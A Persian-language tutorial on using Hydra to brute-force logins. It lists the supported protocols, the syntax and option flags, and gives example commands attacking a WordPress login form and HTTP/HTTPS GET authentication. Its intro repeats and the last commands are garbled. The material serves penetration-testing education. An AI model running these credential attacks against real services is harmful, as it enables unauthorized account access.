همانطور که میدانید Hydra ابزاری بسیار سریع و انعطاف پذیر برای ورود به سیستم با بروت فورس است که از پروتکلهای متعددی پشتیبانی میکند.
در این پست به بررسی چگونگی استفاده از آن برای brute force سرویس های مختلف موجود در اینترنت میپردازیم.
Hydra قابلیت حمله به سرویسهای زیر را دارا میباشد :
سینتکس(دستور) کلی ابزار به شرح زیر است که در آن با استفاده از پارامترهای مورد نیاز چگونگی حمله را برای ابزار مشخص میگردد:
مثال 1 : حمله بروت فورس به فرم لاگین وردپرس :
شرح سویچ و آپشن های مورد استفاده در این نوع حمله :
-l برای مشخص نمودن نام کاربری (یا -L برای معرفی لیستی از نامهای کاربری)
-p به منظور مشخص کردن لیست پسوردها برای برنامه
-vV برای فعال سازی حالت verbose و نمایش نام کاربری و رمز عبور تست شده
-f برای خروج از فرم زمانی که لاگین موفق بوده است.
-t برای اجرای taskهای برنامه در حالت موازی - مشخص نمودن تعداد threadها
مثال 2 : حمله بروت فورس به آدرس با متود GET بر روی HTTP
مثال 3 : حمله بروت فورس به سرویس با متد GET بر روی HTTPS
در این پست به بررسی چگونگی استفاده از آن برای brute force سرویس های مختلف موجود در اینترنت میپردازیم.
Hydra قابلیت حمله به سرویسهای زیر را دارا میباشد :
- asterisk
- cisco
- cisco-enable
- cvs
- firebird
- ftp
- ftps
- http[s]-{head|get}
- icq
- http-proxy
- http-proxy-urlenum
- http[s]-{get|post}-form
- irc
- ldap2[s]
- ldap3[-{cram|digest}md5][s]
- mssql
- nntp
- oracle-listener
- oracle-sid
- pcanywhere
- pcnfs
- pop3[s]
- postgres
- rdp
- redis
- rexec
- rlogin
- rsh
- s7-300
- sip
- smb
- smtp[s]
- smtp-enum
- snmp
- socks5
- ssh
- sshkey
- teamspeak
- telnet[s]
- vmauthd
- vnc
- xmpp
سینتکس(دستور) کلی ابزار به شرح زیر است که در آن با استفاده از پارامترهای مورد نیاز چگونگی حمله را برای ابزار مشخص میگردد:
SYNTAX: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
مثال 1 : حمله بروت فورس به فرم لاگین وردپرس :
hydra -l admin -P passList.txt -vV -f -t 2 172.16.76.132 http-post-form "/wp/Forum/login.php:log=^USER^&pwd=^PASS^:login_error"
شرح سویچ و آپشن های مورد استفاده در این نوع حمله :
-l برای مشخص نمودن نام کاربری (یا -L برای معرفی لیستی از نامهای کاربری)
-p به منظور مشخص کردن لیست پسوردها برای برنامه
-vV برای فعال سازی حالت verbose و نمایش نام کاربری و رمز عبور تست شده
-f برای خروج از فرم زمانی که لاگین موفق بوده است.
-t برای اجرای taskهای برنامه در حالت موازی - مشخص نمودن تعداد threadها
مثال 2 : حمله بروت فورس به آدرس با متود GET بر روی HTTP
<hydra -L <username> -P <wordlist> -t 1 -f -vV <ip address> http-get <url directory
مثال 3 : حمله بروت فورس به سرویس با متد GET بر روی HTTPS
<hydra -L <username> -P <wordlist> -t 1 -f -vV <ip address> https-get <url directory, i.ex